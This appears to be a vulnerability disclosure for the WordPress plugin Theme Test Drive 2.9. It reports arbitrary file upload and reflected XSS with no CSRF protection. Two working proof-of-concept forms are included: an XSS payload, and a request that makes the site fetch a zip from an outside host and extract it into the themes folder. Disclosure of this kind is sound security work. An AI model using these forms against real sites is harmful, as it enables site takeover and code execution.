Hello,

Plugin: Theme Test Drive 2.9 https://wordpress.org/plugins/theme-test-drive/

1. Arbitrary file upload and Reflected Cross-Site Scripting (XSS)

Authenticated administrators can upload arbitrary files and inject arbitrary html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/themes.php?page=themedrive_options_page

Vulnerable parameters: install_theme

Example PHP callstack (XSS):

themedrive_options_page   [/theme-test-drive/themedrive.php:396]

themedrive_handle_theme   [/theme-test-drive/themedrive.php:26]

themedrive_handle_theme_liberal   [/theme-test-drive/themedrive.php:66]

Verification (XSS):

--

<form method="POST" action="http://localhost/wp-admin/themes.php?page=themedrive_options_page" />

<input type="text" name="theme_install" value='1' />

<input type="text" name="install_theme" value='<img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

Attacker can also supply valid zip file, which will be extracted to /wp-content/themes/.

Verification (uploading phpinfo.php):

--

<form method="POST" action="http://localhost/wp-admin/themes.php?page=themedrive_options_page" />

<input type="text" name="theme_install" value='1' />

<input type="text" name="install_theme" value='http://cinu.pl/research/phpinfo.zip' />

<input type="submit" />

</form>

--

Then visit: http://localhost/wp-content/themes/phpinfo.php